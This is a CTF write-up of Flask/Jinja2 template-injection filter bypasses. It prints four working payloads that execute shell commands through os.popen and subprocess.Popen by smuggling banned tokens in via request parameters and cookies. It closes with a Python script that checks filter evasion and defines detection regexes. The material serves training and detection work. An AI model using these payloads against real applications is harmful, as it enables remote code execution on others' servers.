SSTI
Assorted SSTI filter bypasses (Flask/Jinja2, challenges web363 to web367). The common idea: whatever token the filter blocks is moved out of the template body into a request parameter or cookie and read back through request.args / request.values / request.cookies at render time.
SSTI-Web363
Single and double quotes are filtered.
The only string the payload needs, the shell command, is taken from the GET parameter a (request.args.a), so the template body contains no quote characters. [].__class__.__mro__[-1] is object, and __subclasses__()[407] picks subprocess.Popen by index; that index depends on the target's Python build and must be confirmed by enumerating __subclasses__() first. stdout=-1 is subprocess.PIPE written as its integer value so that subprocess never has to be named.
{{[].__class__.__mro__[-1].__subclasses__()[407](request.args.a,shell=True,stdout=-1).communicate()[0]}}&a=cat /flag
SSTI-Web365
Square brackets and single/double quotes are filtered.
Without subscripts, everything is reached through dotted attribute access: url_for.__globals__ exposes the module globals of Flask's url_for helper, which include os, and the command is read from a cookie (request.cookies.cmd) rather than the query string, so the template body carries neither brackets nor quotes.
{{url_for.__globals__.os.popen(request.cookies.cmd).read()}}
SSTI-Web366
Underscores are filtered.
Jinja2's attr filter takes the attribute name as a string, so lipsum|attr(request.values.b) with b=__globals__ resolves lipsum.__globals__ without a single underscore in the template; lipsum is a built-in Jinja2 global function whose module globals contain os. The command itself again comes from parameter a.
{{(lipsum|attr(request.values.b)).os.popen(request.values.a).read()}}&a=cat%20/flag&b=__globals__
SSTI-Web367
The token os is filtered.
The module name is smuggled in as well: the globals dict is fetched with attr as before, then .get(request.values.b) with b=os looks the os module up under a name supplied in the request, so neither the underscores nor the string os appear in the template body. Only the dotted attribute names attr, get, popen and read remain, none of which the filter catches.
{{(lipsum|attr(request.values.a)).get(request.values.b).popen(request.values.c).read()}}&a=__globals__&b=os&c=cat /flag
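The following is an added example and not part of the original notes or of the challenge platform. It models the four blacklists as plain substring filters (an assumption that mirrors the one-line descriptions above, not the challenges' actual source), confirms that each template body passes its own filter while the banned tokens live only in the out-of-band parameters, and then shows why a detector that inspects just the templated field misses these requests: the indicators are spread across the whole query string. The request log lines at the bottom are constructed.

```python
import re

# Assumed substring blacklists per level (illustrative; the real filters
# are not reproduced here).
FILTERS = {
    "web363": ["'", '"'],
    "web365": ["'", '"', "[", "]"],
    "web366": ["_"],
    "web367": ["os"],
}

# Payloads from the notes: (template body, out-of-band values).
PAYLOADS = {
    "web363": ("{{[].__class__.__mro__[-1].__subclasses__()[407]"
               "(request.args.a,shell=True,stdout=-1).communicate()[0]}}",
               {"a": "cat /flag"}),
    "web365": ("{{url_for.__globals__.os.popen(request.cookies.cmd).read()}}",
               {"cmd": "cat /flag"}),  # delivered as a cookie, not a query param
    "web366": ("{{(lipsum|attr(request.values.b)).os.popen(request.values.a).read()}}",
               {"a": "cat /flag", "b": "__globals__"}),
    "web367": ("{{(lipsum|attr(request.values.a)).get(request.values.b)"
               ".popen(request.values.c).read()}}",
               {"a": "__globals__", "b": "os", "c": "cat /flag"}),
}


def banned_tokens(text, banned):
    """Blacklist entries that occur in text (empty list means it passes)."""
    return [t for t in banned if t in text]


def check_level(level):
    """(template passes its level's filter?, banned tokens that were pushed
    into the side-channel parameters instead)."""
    template, params = PAYLOADS[level]
    hits = banned_tokens(template, FILTERS[level])
    smuggled = sorted({t for v in params.values()
                       for t in banned_tokens(v, FILTERS[level])})
    return (not hits), smuggled


# Detection side: patterns worth flagging anywhere in a request line, not
# only inside the parameter that reaches the template.
INDICATORS = [
    r"\{\{", r"\}\}",                 # Jinja2 expression delimiters
    r"__\w+__",                       # dunder names such as __globals__
    r"\|\s*attr\(",                   # attr filter used to hide dunders
    r"request\.(args|values|cookies|form)\.",  # self-referencing request object
    r"__subclasses__|__mro__",
    r"popen|communicate",
]


def ssti_indicators(request_line):
    """Indicator patterns matched in a full request line (path + query)."""
    return [p for p in INDICATORS if re.search(p, request_line)]


if __name__ == "__main__":
    for lvl in PAYLOADS:
        print(lvl, check_level(lvl))
    # Constructed log lines, not real traffic.
    for line in [
        "GET /?name=alice HTTP/1.1",
        "GET /?name=" + PAYLOADS["web367"][0] + "&a=__globals__&b=os&c=cat%20/flag HTTP/1.1",
    ]:
        print(ssti_indicators(line))
```

The web365 case is the one that a query-string-only detector cannot see at all: the command travels in a cookie, so the indicator list should be fed the full request (headers included), not just the path.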